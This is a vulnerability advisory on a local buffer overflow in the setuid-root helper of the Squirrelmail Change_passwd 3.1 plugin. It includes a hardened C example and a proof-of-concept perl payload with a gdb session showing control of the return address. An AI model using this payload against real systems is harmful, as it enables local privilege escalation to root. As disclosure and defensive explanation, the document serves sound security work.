Squirrelmail Change_passwd Buffer Overflow
The Change Passwd plugin is 'a Squirrelmail plugin to allow your users to change his/her system password in /etc/passwd or /etc/shadow, the plugin uses a C program to make possible the alteration of the password'.
A buffer overflow vulnerability in the plugin allows local attackers who are able to invoke the plugin's helper binary directly (usually only root and the web-server user, apache/nobody/etc.) to overflow an internal buffer, execute arbitrary code and gain elevated privileges, because the binary is setuid root.
The information has been provided by Matias Neiff.
* Squirrelmail’s Change_passwd version 3.1
The vulnerable code is in the main() function, which never checks whether the user-supplied data is too large for the destination buffer before calling sprintf().
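The pattern the advisory describes, reconstructed as an added example (not the plugin's own source) with the unbounded sprintf() shown in a comment and a hardened replacement beside it; the buffer size, the username limit and the function names are assumptions:

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>

/* Assumed shape of the flaw: a fixed-size stack buffer filled from argv[1]
 * with no length check. Kept as a comment so nothing here can overflow.
 *
 *   char msg[128];
 *   sprintf(msg, "The user %s don't exist!", argv[1]);
 */

#define MSG_SIZE     128
#define MAX_USERNAME 32   /* assumption: conventional login-name limit */

/* Returns 1 if name looks like a login name (length and charset), else 0.
 * Validating before formatting is what keeps a setuid helper safe. */
int valid_username(const char *name)
{
    size_t len = strlen(name);
    if (len == 0 || len > MAX_USERNAME)
        return 0;
    for (size_t i = 0; i < len; i++) {
        unsigned char c = (unsigned char)name[i];
        if (!(isalnum(c) || c == '_' || c == '-' || c == '.'))
            return 0;
    }
    return 1;
}

/* Hardened replacement: bounded formatting plus an explicit check of the
 * snprintf() return value. Returns 0 on success, -1 if the name is invalid
 * or the message would not fit in out[]. */
int format_user_message(const char *name, char *out, size_t outlen)
{
    if (!valid_username(name))
        return -1;
    int n = snprintf(out, outlen, "The user %s don't exist!", name);
    if (n < 0 || (size_t)n >= outlen) {
        if (outlen > 0)
            out[0] = '\0';      /* truncated: do not use a partial message */
        return -1;
    }
    return 0;
}

int main(int argc, char **argv)
{
    char msg[MSG_SIZE];
    if (argc < 2 || format_user_message(argv[1], msg, sizeof msg) != 0) {
        fprintf(stderr, "rejected: missing, invalid or over-long user name\n");
        return 1;
    }
    puts(msg);
    return 0;
}
```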
Proof of Concept:
# export RET=`perl -e 'print "BCDE".("A"x136)."0123"'`
# gdb ./chpasswd
GNU gdb 6.0-debian
Copyright 2003 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-linux"...
(gdb) r $RET a a
Starting program: /home/noam/change_passwd/chpasswd $RET a a
The user BCDEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA0123 don’t exist!
Program received signal SIGSEGV, Segmentation fault.
0x33323130 in ?? ()